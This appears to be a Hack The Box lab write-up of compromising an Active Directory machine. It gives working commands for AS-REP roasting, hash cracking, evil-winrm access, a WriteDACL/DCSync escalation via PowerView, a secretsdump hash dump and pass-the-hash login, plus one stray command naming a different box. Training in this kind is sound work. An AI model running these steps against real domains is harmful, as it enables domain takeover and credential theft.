Hack the Box Active Directory machine. Rated “easy” by the HTB community, although it seemed much harder than other “easy” machines.
Recon
I use rustscan to quickly identify all open ports and add options that immediately triggers nmap to run using script and version scans against the open ports it found.
Port 88 –
Kerberosand port 389 –ldapindicate that this is a Active Directory (AD) machine. The ldap discovery of the domain and type of machine confirms it is.
Add the domain to our /etc/hosts file.
I like to check smb for shares that could be valuable. I do this with smbmap.
smbmap -H htb.local
No luck.
RPC and LDAP are protocols that if misconfigured, we can geta lot of domain information from unauthenticated queries. Let’s test RPC first.
rpcclient -N 10.129.95.210
rpcclient -U '' 10.129.95.210
Connecting on rpc via null authentication must be blocked or restricted.
LDAP Enumeration
We can test LDAP using ldapsearch.
ldapsearch -H ldap://10.129.95.210 -x -b "dc=htb,dc=local" # too much information
We can modify the query to get ore concise output.
ldapsearch -H ldap://10.129.95.210 -x -b "dc=htb,dc=local" '(objectClass=Person)' sAMAccountName | grep 'sAMAccountName:' | cut -d ' ' -f 2
Now that we have users, we can run some AD attacks and try getting more information. First, we need to add these users to a file and then check if any of then have Kerberos pre-authentication disable. This is an AS-REP roast attack and if it is dsiabled then we will get back there encrypted password hash which we can crack offline.
echo 'sebastien
lucinda
andy
mark
santi
' > users.txt
AD Attacks
GetNPUsers.py -request -usersfile users.txt htb.local/ -dc-ip 10.129.95.210
These users seem to not have kerberos pre-authentication disabled.
We cannot run a kerberoasting attack or start bloodhound because we have no domain credentials yet. It’s time to go back through our enumeration methodology and see if there was anything that I missed. I want to run a tool to get domain information again with enum4linux.
enum4linux 10.129.95.210
This is why using multiple tools for the same thing is crucial. Some tools may identify things others don’t because of how the network has set up their security controls.
Add new user to file and run GetNPUsers.py again.
echo 'svc-alfresco' >> users.txt
GetNPUsers.py -request -usersfile users.txt htb.local/ -dc-ip 10.129.95.210
The AS-REP (Authentication Server Response) is an encrypted Kerberos Ticket-Granting Ticket (TGT) for a user account whose Kerberos pre-authentication is disabled.
We can search this this hash identifier $krb5asrep$23$ here: https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt
We have domain credentials!
I like to run a kerberoasting attack because it could be a quick win. We can run this with attack with any authenticated domain user. By default, any authenticated domain user can query AD to get a list of all accounts with registered SPNs. This attack will get the Kerberos Service Tickets for registered SPNs and we will get in an encrypted hash that we could crack offline.
GetUserSPNs.py -request -dc-ip 10.129.95.210 active.htb/SVC_TGS
Our user credentials are valid; it seems that there are no
kerberoastableusers.
Foothold
We can check if this can get us initial access to the machine like running a tool like crackmapexec or the newer version netexec.
netexec winrm 10.129.95.210 -u svc-alfresco -p 's3rvice'
svc-alfrescohas administrative privileges via thewinrmprotocol on the target. We can use a tool likeevil-wirnmto access the target.
evil-winrm -i 10.129.95.210 -u svc-alfresco -p 's3rvice'
We have a foothold within the network.
The user.txt can be found in the Desktop directory.
cd ../Desktop
cat user.txt
The first thing I always check besides the network is the users permissions much like sudo -l on a Linux machine.
whoami /priv
Nothing very useful.
BloodHound
We could start up BloodHound to get a visual representation of the AD environment.
/opt/bloodhound-cli up # starts bloodhound
/opt/bloodhound-cli running # shows the running services and the port that bloodhound ui is on. 
We’re in, but we need to collect data to investigate.
I like using this bloodhound script that I got from a Tyler Ramsby AD enumeration with Bloodhound video. You input the information required and it starts the data collection process for us.
/opt/ad-bloodhound.sh
All the json files were collected from the execution of this script.
We can upload this by going to the bloodhound ui > administration > upload files.
Now we have to navigate to the left pane again and select explore. Search up our user as the starting node and make sure they are marked as “owned”. In this scenario I went to the PATHIFINDING feature at the top and add our user svc-alfresco as the starting node and the DC htb.local as the destination node. It created a direct oath for us in order to compromise the entire domain. Such a great tool!
We can see at the bottom the path, and if we select each specifically, it’ll tell us how and why it works.
Based on this path it looks like our user has nested group permissions. The primary purpose of nesting groups is to simplify access management by following a structured model, but it can also create complex and dangerous privilege escalation paths if not managed carefully. The security issues here are:
- Because of the nesting, our user effectively inherits all the permissions of the final group, Account Operators.
- The
Account Operatorsgroup is a default, built-in security group in Active Directory (AD) that can create and modify user accounts. - With
GenericAll, an attacker can modify the DC’s security settings to grant themselves rights likeDCSync, which allows them to impersonate any user and extract all password hashes from the domain.
WriteDACLto the DC: The WriteDACL (Write Discretionary Access Control List) permission on a Domain Controller is one of the most critical permissions an attacker can have. It allows a user to modify the security descriptor of the DC, meaning they can grant themselves new, higher privileges, such as Full Control over the DC object, leading to a complete Domain Compromise.
Priv Esc
First we’ll abuse the Account Operators permissions by adding a user to the domain.
net user jose pass123 /add /domain
net group "Exchange Windows Permissions" jose /add
Now we can abuse WriteDACL to give our new user the DCSync rights. First we transfer the powerview file using the upload feature with evil-winrm. Importing powerview allows us to run commands like “Add-DomainObjectAcl,” which is needed to abuse the WriteDACL permission.
upload PowerView.ps1
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'pass123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\jose', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jose -Rights DCSync
No errors, guessing it worked.
The last command from the bloodhound image shows we can start mimikatz and run lsadump::dcsync. But I rather use secretdump since it’ll be faster.
secretsdump.py htb.local/jose:pass123@10.129.95.210
We got all the domain account hashes.
There are several things we could do. We could take all these hashes and crack offline, we could add these users to a file, add the hashes to a file and then spray them like a clusterbomb in burp using netexec/crackmapexec. However, since evil-wirnm allows us to sign in with the NT portion of the hash (second half), we could simply attempt logging in with the administrator username and their NT hash.
evil-winrm -i 10.129.95.210 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Pwn3d!